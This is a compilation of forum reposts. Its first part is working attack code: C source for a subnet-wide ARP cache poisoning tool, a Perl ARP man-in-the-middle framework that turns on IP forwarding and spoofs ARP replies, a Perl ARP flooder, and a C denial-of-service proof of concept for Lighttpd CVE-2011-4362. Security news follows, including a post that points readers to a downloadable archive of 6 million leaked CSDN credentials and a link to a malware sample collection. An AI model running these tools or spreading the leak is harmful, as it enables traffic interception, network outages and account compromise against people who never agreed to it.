addresses...\n"); printf("This may take a while so go get a drink or something.\n"); i = 0; while (childnotdead) { /* watch for ARP Replies */ FD_ZERO(&readfds); FD_SET(sockfd, &readfds); tv.tv_sec = 2; memset(packet_recv, 0, sizeof(packet_recv)); if (select(sockfd+1, &readfds, NULL, NULL, &tv) < 0) { perror("select()"); } if (!childnotdead) break; if (FD_ISSET(sockfd, &readfds)) { if ((bytes = read(sockfd, packet_recv, sizeof(packet_recv))) < 0) { perror("read"); } if (bytes > sizeof(EthernetHeader)) { ethernet_header_reply = (EthernetHeader *)packet_recv; if (ntohs(ethernet_header_reply->protocol) == ETHERTYPE_ARP) { arp_header_reply = (ArpHeader *)(packet_recv + sizeof(EthernetHeader)); if (ntohs(arp_header_reply->opcode) == ARPOP_REPLY) { /* make sure source is not myself, the default route, or a duplicate entry */ if (validTarget(arp_header_reply->source_ip, device_in_addr, gateway_in_addr, remote_host_info, i)) { memcpy(remote_host_info[i].mac, arp_header_reply->source_hardware, 6); remote_host_info[i].ip = arp_header_reply->source_ip; i++; } } } } } } hosts_online = i; printf("MAC addresses enumerated, %d machines attached to current subnet.\n", hosts_online); memcpy(answer, getAns("Display list of IP -> MAC? (y/n) "), sizeof(answer)); if (!strcmp(answer, "yes") || !strcmp(answer, "y")) { for (i = 0; i < hosts_online; i++) printf("(%d) %s -> %s\n", i, uitos(ntohl(remote_host_info[i].ip)), mactos(remote_host_info[i].mac)); memset(answer, 0, sizeof(answer)); memcpy(answer, getAns("Would you like to remove any of these hosts from this list? (y/n) "), sizeof(answer)); if (!strcmp(answer, "yes") || !strcmp(answer, "y")) { removeHosts(remote_host_info, hosts_online); } sleep(10); } } /** END MAC ADDRESS **/ printf("\n"); /** SEND SPOOFED ARP REPLY TO EACH HOST ONLINE **/ for ( { //for()ever!! for (i = 0; i < hosts_online; i++) { printf("Poisoning %s...\n", uitos(ntohl(remote_host_info[i].ip))); sleep(1); createArpHeader(arp_header, device_mac, remote_host_info[i].mac, gateway_in_addr, remote_host_info[i].ip, ARPOP_REPLY); createEthHeader(arp_ethernet_header, gateway_mac, remote_host_info[i].mac, ETHERTYPE_ARP); //printPacket(ArpPacket, ArpPacketSize); if (!sendPacket(sockfd, ArpPacket, ArpPacketSize)) { perror(" [*] Packet send failed!\n"); exit(-1); } } printf("Subnet should be down. Repoisoning in 30s ...\n\n"); sleep(30); printf("Repoisoning!\n"); sleep(2); } /** END REPLIES **/ free(ArpPacket); close(sockfd); return 0; } Sursa: r00tsecurity -> Source Code Center :: ARP Cache Poisoning

Monkey || ARP Poisoning tool # monkey.pl # # ARP POISONING FrameWork # Copyright 2011 madstein <madstein@f0r3ns1cs> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. # # use Net::ARP ; use Term::ANSIColor; print q{ -------------------------- MADSTEIN ARP-OPT -------------------------- 1- MITM 2- REPING VICTIM }; print "\n"; print ">Choose OPERANDI:\n"; print color("green"),"\n>>>\n",color("reset"); $menu = <STDIN>; chomp $menu; if($menu == "1") { print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ; $iface = <STDIN>; print color ("red"), "[+]",color ("reset"), "Insert Gateway IP \n" ; $gateway = <STDIN> ; print color ("red"), "[+]",color ("reset"), "Insert Target IP \n" ; $target = <STDIN> ; chomp ($gateway,$target,$iface); #Lets Forward All the Junk shall we system "iptables -P FORWARD ACCEPT"; system "iptables --table nat -A POSTROUTING -o $iface -j MASQUERADE"; #Note some times Net::ARP fails to lookup the Target MAC #If you ever enconter that kind of problem just reload the script #or hardcode the Target MAC $gatemac = Net::ARP::arp_lookup($dev,$gateway); $targetmac = Net::ARP::arp_lookup($dev,$target); $mymac = Net::ARP::get_mac("$iface"); if ($gatemac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Gateway MAC\n"; die } if ($targetmac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Target MAC\n"; die} if ($mymac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Local MAC\n"; die } else { system "clear"; print color ("red"), q{ < wtf > ----- \ \ .:!!!!!:. .!!!!!:. .!!!!!!!!!! ~~~~!!!!!!. .!!!!!!!UWWW$$$ :$$NWX!!: .!!!!XUWW$$$$$$$$$P $$$$$##WX!: .<!!!!UW$$$$" $$$$$$$$# $$$$$ $$$UX :!!UW$$$$$$$$$ 4$$$$$* ^$$$B $$$$\ $$$$$$$$$$$$ d$$R" "*$bd$$$$ '*$$$$$$$$$$$o+#" """" """"""" PURE POISON }, color ("reset"); print color ("green"),"[+]",color ("reset"),"Poison on the Way\n"; print color ("green"),"[+]",color ("reset"),"Monkey in the Middle off $gateway $gatemac |and| $target $targetmac\n"; while (1) { #Gateway operandi this is the, where we Tell the victim we are the gateway Net::ARP::send_packet($iface, $gateway, $target, $mymac, $targetmac, 'reply'); #Target operandi this is the, where we tell the gateway that we are the victim Net::ARP::send_packet($iface, $target, $gateway, $mymac, $gatemac, 'reply'); #ence you see this output you will be poisoning || attack on the way print STDERR color ("green"),".", color ("reset"); sleep (2); } } } if ($menu =="2"){ print color ("green"), "[+]",color ("reset"), "ARP Repinger \n" ; print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ; $iface = <STDIN>; print color ("red"), "[+]",color ("reset"), "Insert Gateway IP \n" ; $gateway = <STDIN> ; print color ("red"), "[+]",color ("reset"), "Insert Target IP \n" ; $target = <STDIN> ; chomp ($gateway,$target,$iface); #Lets Forward All the Junk shall we system "iptables -P FORWARD ACCEPT"; system "iptables --table nat -A POSTROUTING -o $iface -j MASQUERADE"; #Note some times Net::ARP fails to lookup the Target MAC #If you ever enconter that kind of problem just reload the script #or hardcode the Target MAC $gatemac = Net::ARP::arp_lookup($dev,$gateway); $targetmac = Net::ARP::arp_lookup($dev,$target); $mymac = Net::ARP::get_mac("$iface"); if ($gatemac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Gateway MAC\n"; die } if ($targetmac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Target MAC\n"; die} if ($mymac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Local MAC\n"; die } else { system "clear"; print color ("yellow"), q{ < wtf > ----- \ \ .:!!!!!:. .!!!!!:. .!!!!!!!!!! ~~~~!!!!!!. .!!!!!!!UWWW$$$ :$$NWX!!: .!!!!XUWW$$$$$$$$$P $$$$$##WX!: .<!!!!UW$$$$" $$$$$$$$# $$$$$ $$$UX :!!UW$$$$$$$$$ 4$$$$$* ^$$$B $$$$\ $$$$$$$$$$$$ d$$R" "*$bd$$$$ '*$$$$$$$$$$$o+#" """" """"""" PURE POISON }, color ("reset"); print color ("green"),"[+]",color ("reset"),"REPINGER VERSION\n"; for ($count = 7; $count >= 1; $count--) { #Gateway operandi this is, the where we Tell the victim where the gateway is Net::ARP::send_packet($iface, $gateway, $target, $gatemac, $targetmac, 'reply'); #Target operandi this is the, where we tell the gateway where the victim is Net::ARP::send_packet($iface, $target, $gateway, $targetmac, $gatemac, 'reply'); #ence you see this output you will be REPINGING the VIctim attack will stop print STDERR color ("green"),".", color ("reset"); sleep (2); } } print "REPINGED\n"; } Sursa: r00tsecurity -> Source Code Center :: Monkey || ARP Poisoning tool

Network Destroyer ARP TCP Flooder [COLOR=#888] [/COLOR] #!/usr/bin/perl #ubuntu sudo apt-get install libnet-arp-perl #ubuntu sudo apt-get install libnet-rawip-perl #Madstein - arp tester use Net::RawIP; use Term::ANSIColor; use Net::ARP ; inicio: print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ; $iface = <STDIN>; print color ("red"), "[+]",color ("reset"), "Insert IP to Get Mac Addr \n" ; $target = <STDIN> ; chomp ( $target,$iface ) ; $getmac = Net::ARP::arp_lookup($dev,$target); my $count = 0; if ($getmac =~ unknow ) { print "Something went Wrong The Target Retrieved an unknow Mac addr\n"; print "Prees Any Key To Restart Program\n"; $restart = <STDIN>; goto inicio ; } elsif ($getmac =~ "00:00:00:00:00:00" ) { print "00:00:00:00:00:00 retrived error\n"; print "Prees Any Key To Restart Program\n"; $restart = <STDIN>; goto inicio ; } else { print color ("red"), "[+]",color ("reset"), " $target mac is $getmac \n"; print color ("green"), "[+]",color ("reset"), " type.. yes ..to flood || .. no .. to restart Program \n"; $flood = <STDIN>; if ($flood =~ yes ){ while (1) { my $src = join ".", map int rand 255, 1 .. 4; my $spoofedmac = join ":", map int rand 99, 1 .. 6, ; Net::ARP::send_packet($iface, # Device $src, # Source IP $target, # Destination IP $spoofedmac, # Source MAC $getmac, # Destinaton MAC 'reply'); # ARP operation $count++; print "Packeth Sent Tru $iface to $target using $src as ip "; print "with this spoofed mac $spoofedmac amount $count"; } } elsif ($flood =~ "no") { system " clear"; goto inicio;} } [COLOR=#888] [/COLOR] Sursa: r00tsecurity -> Source Code Center :: Network Destroyer ARP TCP Flooder

Lighttpd 1.4.30 / 1.5 Denial Of Service Authored by Adam Zabrocki Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit. /* * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang * * Here the vulnerable code (src/http_auth.c:67) * * --- CUT --- * static const short base64_reverse_table[256] = { * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF * }; * * static unsigned char * base64_decode(buffer *out, const char *in) { * ... * int ch, ...; * size_t i; * ... * * ch = in[i]; * ... * ch = base64_reverse_table[ch]; * ... * } * --- CUT --- * * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices. * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata * section before the base64_reverse_table table cause this situation. * * I have added some extra debug in the lighttpd source code to see if this vulnerability is * executed correctly. Here is output for one of the example: * * --- CUT --- * ptr[0x9a92c48] size[0xc0] used[0x0] * 127(. | 0 | 0) * -128(t | 1 | 0) * -127(e | 2 | 1) * -126(' | 3 | 2) * -125(e | 4 | 3) * -124(u | 5 | 3) * -123(r | 6 | 4) * -122(' | 7 | 5) * -121(s | 8 | 6) * -120(c | 9 | 6) * -119(i | 10 | 7) * -118(n | 11 | 8) * -117(i | 12 | 9) * -116( | 13 | 9) * -115(a | 14 | 10) * -114(t | 15 | 11) * -113(. | 16 | 12) * -112(e | 17 | 12) * -111(u | 18 | 13) * -110(r | 19 | 14) * -109(' | 20 | 15) * -108(f | 21 | 15) * -107(i | 22 | 16) * -106(e | 23 | 17) * -105(: | 24 | 18) * -104(= | 25 | 18) * -103(o | 26 | 19) * -102(t | 27 | 20) * -101(o | 28 | 21) * -100( | 29 | 21) * -99(a | 30 | 22) * -98(g | 31 | 23) * -97(. | 32 | 24) * -96(d | 33 | 24) * -95(g | 34 | 25) * -94(s | 35 | 26) * -93(: | 36 | 27) * -92(u | 37 | 27) * -91(s | 38 | 28) * -90(p | 39 | 29) * -89(o | 40 | 30) * -88(t | 41 | 30) * -87(d | 42 | 31) * -86(b | 43 | 32) * -85(c | 44 | 33) * -84(e | 45 | 33) * -83(d | 46 | 34) * -82(( | 47 | 35) * -81(n | 48 | 36) * -80(y | 49 | 36) * -79(h | 50 | 37) * -78(d | 51 | 38) * -77(g | 52 | 39) * -76(s | 53 | 39) * -75( | 54 | 40) * -74(r | 55 | 41) * -73(p | 56 | 42) * -72(a | 57 | 42) * -71(n | 58 | 43) * -70(. | 59 | 44) * -69(. | 60 | 45) * -68(d | 61 | 45) * -67(g | 62 | 46) * -66(s | 63 | 47) * -65(: | 64 | 48) * -64(( | 65 | 48) * -63(d | 66 | 49) * -62(- | 67 | 50) * -61(e | 68 | 51) * -60(s | 69 | 51) * -59( | 70 | 52) * -58(i | 71 | 53) * -57(s | 72 | 54) * -56(n | 73 | 54) * -55( | 74 | 55) * -54(i | 75 | 56) * -53(l | 76 | 57) * -52(. | 77 | 57) * -51(. | 78 | 58) * -50(k | 79 | 59) * -49(0 | 80 | 60) * -48(% | 81 | 60) * -47(] | 82 | 61) * -46(p | 83 | 62) * -45(r | 84 | 63) * -44(0 | 85 | 63) * -43(% | 86 | 64) * -42(] | 87 | 65) * -41(s | 88 | 66) * -40(z | 89 | 66) * -39([ | 90 | 67) * -38(x | 91 | 68) * -37(x | 92 | 69) * -36( | 93 | 69) * -35(s | 94 | 70) * -34(d | 95 | 71) * -33(0 | 96 | 72) * -32(% | 97 | 72) * -31(] | 98 | 73) * -30(. | 99 | 74) * -29(. | 100 | 75) * -28(d | 101 | 75) * -27(c | 102 | 76) * -26(d | 103 | 77) * -25(i | 104 | 78) * -24(g | 105 | 78) * -23(b | 106 | 79) * -22(s | 107 | 80) * -21(6 | 108 | 81) * -20(- | 109 | 81) * -19(t | 110 | 82) * -18(i | 111 | 83) * -17(g | 112 | 84) * -16(f | 113 | 84) * -15(i | 114 | 85) * -14(e | 115 | 86) * -13(. | 116 | 87) * -12(. | 117 | 87) * -11(. | 118 | 88) * -10(. | 119 | 89) * -9(. | 120 | 90) * -8(. | 121 | 90) * -7(. | 122 | 91) * -6(. | 123 | 92) * -5(. | 124 | 93) * -4(. | 125 | 93) * -3(. | 126 | 94) * -2(. | 127 | 95) * -1(. | 128 | 96) * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0] * ptr[0x9a92c48] size[0xc0] used[0x60] * string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.] * --- CUT --- * * First column is the offset so vulnerability is executed like it should be * (negative offsets). Second column is byte which is read out-of-bound. * * * Maybe you can find vulnerable binary? * * * Best regards, * Adam 'pi3' Zabrocki * * * -- * http://pi3.com.pl * http://site.pi3.com.pl/exp/p_cve-2011-4362.c * http://blog.pi3.com.pl/?p=277 * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <getopt.h> #define PORT 80 #define SA struct sockaddr char header[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic "; char header_port[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s:%d\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic "; int main(int argc, char *argv[]) { int i=PORT,opt=0,sockfd; char *remote_dir = NULL; char *r_hostname = NULL; struct sockaddr_in servaddr; struct hostent *h = NULL; char *buf; unsigned int len = 0x0; if (!argv[1]) usage(argv[0]); printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n"); printf("\n\t\t[+] Preparing arguments... "); while((opt = getopt(argc,argv,"h:d:p:?")) != -1) { switch(opt) { case 'h': r_hostname = strdup(optarg); if ( (h = gethostbyname(r_hostname))==NULL) { printf("Gethostbyname() field!\n"); exit(-1); } break; case 'p': i=atoi(optarg); break; case 'd': remote_dir = strdup(optarg); break; case '?': usage(argv[0]); break; default: usage(argv[0]); break; } } if (!remote_dir || !h) { usage(argv[0]); exit(-1); } servaddr.sin_family = AF_INET; servaddr.sin_port = htons(i); servaddr.sin_addr = *(struct in_addr*)h->h_addr; len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512; if ( (buf = (char *)malloc(len)) == NULL) { printf("malloc() \n"); exit(-1); } memset(buf,0x0,len); if (i != 80) snprintf(buf,len,header_port,remote_dir,r_hostname,i); else snprintf(buf,len,header,remote_dir,r_hostname); for (i=0;i<130;i++) buf[strlen(buf)] = 127+i; buf[strlen(buf)] = '\r'; buf[strlen(buf)] = '\n'; buf[strlen(buf)] = '\r'; buf[strlen(buf)] = '\n'; printf("OK\n\t\t[+] Creating socket... "); if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) { printf("Socket() error!\n"); exit(-1); } printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname); if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) { printf("Connect() error!\n"); exit(-1); } printf("OK\n\t\t[+] Sending dirty packet... "); // write(1,buf,strlen(buf)); write(sockfd,buf,strlen(buf)); printf("OK\n\n\t\t[+] Check the website!\n\n"); close(sockfd); } int usage(char *arg) { printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n"); printf("\n\tUsage: %s <options>\n\n\t\tOptions:\n",arg); printf("\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n"); exit(0); } Sursa: Lighttpd 1.4.30 / 1.5 Denial Of Service ? Packet Storm

Lynis Auditing Tool 1.3.0 Authored by Michael Boelen | Site rootkit.nl Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes. This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems. Changes: Some tests have been extended and a few new ones have been added to this release. There are also improvements for the screen output and logging. Download: http://packetstormsecurity.org/files/download/108164/lynis-1.3.0.tar.gz

Pentagon approved Android to be used by DoD officials The Pentagon has approved a version of Android running on Dell hardware to be used by DoD officials, along with the BlackBerry. The approval of Android by the DoD is a major setback for Apple's iPhone. The military approval is quite specific. Android can only be used on Dell's hardware running Android 2.2. Dell is now offering Dell Venue which runs on Android 2.2. So, this is the phone which DoD employees can use. The Dell Mobile Security for Android platform has been certified by the Defense Information Systems Agency (DISA) for information assurance and use on defence networks. The Dell Android solution will help the military adapt to today’s operating environment with greater mobility and improved, real-time access to information on the ground. Why the DoD chose Android ? The reason was simple: open source. Starts & Stripes repots, “Android, developed by Google and other companies, is open source software meaning it can be easily configured by uses – including DOD tech whizzes who want to install security measures.” Using Apple's iPhone or iOS by government officials is a risk, especially when used by non-American officials. Apple tracks your movement through the built-in GPS chips. Other features include enhanced password protection such as the ability to lock the device down after multiple unsuccessful password entries. Administrators also can remotely control the peripherals and security policy levels on the device, he said. The government-issue Streak 5 also includes DISA-approved security provided by Good Technology’s Mobility Suite. Although the Streak 5 is no longer available commercially, Dell is supplying it to DOD because the military likes the form factor, Marinho said. However, he added that the same capabilities and service can be delivered to other platforms running on Android. Sursa: Pentagon approved Android to be used by DoD officials | The Hacker News (THN)

Safegroup malwares 12.2011/ - 24.12.2011 11:12 11.2011/ - 30.11.2011 07:16 10.2011/ - 01.11.2011 06:30 09.2011/ - 25.09.2011 12:53 wiry do gier/ - 08.09.2011 05:05 06.2011/ - 08.09.2011 12:36 05.2011/ - 08.09.2011 12:27 04.2011/ - 08.09.2011 12:16 03.2011/ - 08.09.2011 12:06 02.2011/ - 07.09.2011 11:58 01.2011/ - 07.09.2011 11:54 exploits/ - 07.09.2011 11:01 ALL_MAL_URLS/ - 07.09.2011 11:00 08.2011/ - 07.09.2011 10:59 07.2011/ - 07.09.2011 10:53 Link: http://malwares.pl/

[h=2]Nytro: Message to Anonymous - "Muie"[/h]

Unde e provocarea? Asta pare mai mult o tema la informatica.

SecurityXploded Ebook Search Exemplu: [TABLE=width: 98%, align: left] [TR] [TD]Showing 1 to 10 out of 2981 results[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] CCNA_security.pdf Size: 33,214 KB, Download Count: 14,500[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Cisco Press - CCNA Security Packet Tracer Manual.pdf Size: 1,438 KB, Download Count: 7,189[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Network.Security.Bible.Jan.2005.pdf Size: 12,841 KB, Download Count: 7,171[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] CCNA-SECURITY-640.553.pdf Size: 33,214 KB, Download Count: 6,065[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Sybex CompTIA Security+ Studyguide 3rd Ed.pdf Size: 10,876 KB, Download Count: 5,843 [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] CISSP - Certified Information Systems Security Professional Study Guide, Third Edition.pdf Size: 14,566 KB, Download Count: 5,678[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Damodaran On Valuation Security Analysis for investment and corporate finance.PDF Size: 29,802 KB, Download Count: 5,637[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] CCNA Security Quick Reference.pdf Size: 4,087 KB, Download Count: 5,064[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Cryptography and Network Security Forouzan.pdf Size: 50,157 KB, Download Count: 4,301[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Network.Security.Technologies.Second.Edition.pdf Size: 4,478 KB, Download Count: 3,608[/TD] [/TR] [/TABLE] Link: http://securityxploded.com/search-ebooks.php

China Software Developer Network (CSDN) 6 Million user data Leaked Posted by THN Reporter On 12/21/2011 07:33:00 AM The "Chinese Software Developer Network" (CSDN), operated by Bailian Midami Digital Technology Co., Ltd., is one of the biggest networks of software developers in China. A text file with 6 Million CSDN user info including user name, password, emails, all in clear text leaked on internet. The Download Link (use xunlei to download the file) of the File is available on various social Networks. NowChinese programmers are busy changing their password now. Full archive of 104.9 MB (MD5 = b75678048d100600d3a6c648075636a7) available for Download Now : Here Just did some data ming on CSDN leaked user data. Some interesting findings. Here are the results of Top 100 email providers form 6M CSDN user emails : @qq.com, 1976190 @163.com, 1766919 @126.com, 807893 @sina.com, 351590 @yahoo.com.cn, 205487 @hotmail.com, 202944 Security is important, especially for online service. And NEVER store user password in clear texts. Sursa: China Software Developer Network (CSDN) 6 Million user data Leaked | The Hacker News (THN)

[h=1]Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers[/h] December 22nd, 2011, 14:41 GMT · By Eduard Kovacs Medium severity vulnerabilities are found in Kaspersky Anti-Virus and Kaspersky Internet Security 2011/2012 which can allow an attacker to crash the complete software process. Researchers from Vulnerability Laboratory found a flaw caused by an invalid pointer corruption when processing a corrupt .cfg file through the Kaspersky exception filters. The bug seems to be located in basegui.ppl and basegui.dll when a cfg file import is processed. A proof of concept vide was also published along with the disclosure. “The PoC is not affected by the import exception-handling & get through without any problems. A invalid pointer write & read allows a local attacker to crash the software via memory corruption. The technic & software to detect the bug in the binary is prv8,” Benjamin Kunz Mejri, Vulnerability Laboratory founder, wrote. It also seems that a local attacker doesn’t need to know any passwords in order to load the malicious configuration file. According to the timeline report provided by Vulnerability Labs, Kaspersky was notified on the issue in December 2010 and responded a month later. The information on the vulnerabilities was not disclosed until a few days ago, but there is no mention of the bug being fixed. A while back, I had the opportunity to have a chat with Benjamin Kunz Mejri on the security issues they discovered and, at the time, he admitted that not everyone appreciates what they’re doing. “There are 2 options for the product vendor ... he hates us because he cannot see his own flaws/mistakes/fails ... or he loves us because he can now see his flaws/mistakes/fails. Nothing between. The most vendors reply very friendly & ask us for disclosure partnership (cooperation) for future bug publications,” he said. I have contacted Kaspersky to see what they have to say on the matter so stay tuned for an update. Sursa: Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers - Softpedia

[h=1]Untethered jailbreak demonstrated for iOS 5, iOS 5.1[/h] Dec. 22, 2011 (8:25 am) By: Will Shanklin Are you itching for that untethered iOS 5 jailbreak that’s just around the corner? Do you like being teased? If so, you’ll want to check out the video that iOS hacker extraordinaire pod2g has posted. As advertised, it’s a jailbreak and it doesn’t require PC connection after a reboot. The phone in the video is an iPhone 4, not the iPhone 4S. pod2g has also been working on an iOS 5 jailbreak for the A5-running iPad 2 and iPhone 4S, but they’re farther from release. This jailbreak will be for all iOS 5 devices other than those two. That means the iPhone 4, iPhone 3GS, iPod touch 4th generation, and original iPad will be getting in on the untethered action. Most developers hate being pestered for release dates, but pod2g has been generous with progress updates. Last week it sounded like the jailbreak was going through its final days of testing, but he’s had more kinks to work out. He now says that it’s nearly ready for prime time, but also asks for patience, saying that there are “some more days to wait.” An untethered jailbreak for iOS 5 would be a welcomed holiday gift for iOS users. The firmware has been around for a couple of months now. Though it has been jailbreakable from the beginning, it’s a tethered jailbreak, requiring you to connect your device to a PC every time you reboot your device. The untethered jailbreak will remove those chains. As nice as the untethered jailbreak will be, the real prize will be a jailbreak for A5 devices. The iPad 2 and iPhone 4S have thus far proven to be nearly impossible to hack, but pod2g has been making progress on that front too. Last weekend he mentioned that the biggest obstacles were processor cache issues, but he quickly remedied that. The iPhone 4S and iPad 2 jailbreak won’t be release as quickly as the jailbreak in the video, but there’s a good chance pod2g will be releasing it before too long. via pod2g Sursa: Untethered jailbreak demonstrated for iOS 5, iOS 5.1 – Cell Phones & Mobile Device Technology News & Updates | Geek.com

[h=2]Atacuri informatice în 2012: ?inte stabilite, r?zboi cibernetic, amenin??ri mobile [/h]22 12 2011 15:39 Corina Cailean Ce ne va aduce 2012 din punct de vedere al securit??ii informatice? În mare, va trebui s? ne a?tept?m nu doar la o cre?tere extrem? a atacurilor cu ?inte specifice asupra institu?iilor de stat ?i asupra marilor companii, dar este posibil ca din ce în ce mai multe organiza?ii s? fie afectate de incidente informatice. Practic, ?inta principal? a atacatorilor cibernetici o vor constitui guvernele ?i marile corpora?ii din întreaga lume. Pentru noi, ca simpli utilizatori, „c?lcâiul lui Ahile” îl vor constitui telefoanele mobile, sus?in exper?ii Kaspersky Lab, care au realizat un raport de previziuni pentru anul viitor. Alexander Gostev, autorul raportului „Cyberthreat Forecast for 2012”, sus?ine c?, pentru moment, majoritatea incidentelor informatice afecteaz? companiile ?i organiza?iile guvernamentale implicate în fabricarea de armament, opera?iuni financiare sau în activit??i legate de cercetarea în domeniul hi-tech sau în domeniul ?tiin?ei. Anul viitor, vor fi afectate ?i companiile care activeaz? în domenii ca extrac?ia de resurse naturale, energie, transport, alimenta?ie ?i farmaceutice. Din punctul de vedere al utilizatorului „casnic”, e important de re?inut c? printre ?intele predilecte se vor num?ra ?i companiile care furnizeaz? servicii de Internet, precum ?i cele care se ocup? cu securitatea informa?iilor. Atacurile vor fi mai extinse din punct de vedere geografic anul viitor, incluzând Europa Occidental? ?i SUA, ?i vor afecta Europa de Est, Orientul Mijlociu ?i Asia de Sud-Est. Exper?ii Kaspersky Lab prev?d c? infractorii cibernetici î?i vor schimba metodele de atac, pentru a se adapta la competi?ia dintre companiile de securitate IT, ce investigheaz? acest tip de atacuri ?i care ofer? protec?ie împotriva lor. Nivelul crescut de aten?ie la bre?ele de securitate va reprezenta înc? un motiv pentru care atacatorii vor fi nevoi?i s? caute noi instrumente. Metodele conven?ionale de atac, ce implic? ata?amente de e-mail care exploateaz? vulnerabilit??ile din sistem vor deveni din ce în ce mai ineficiente, în timp ce atacurile prin intermediul motoarelor de c?utare (influen?area 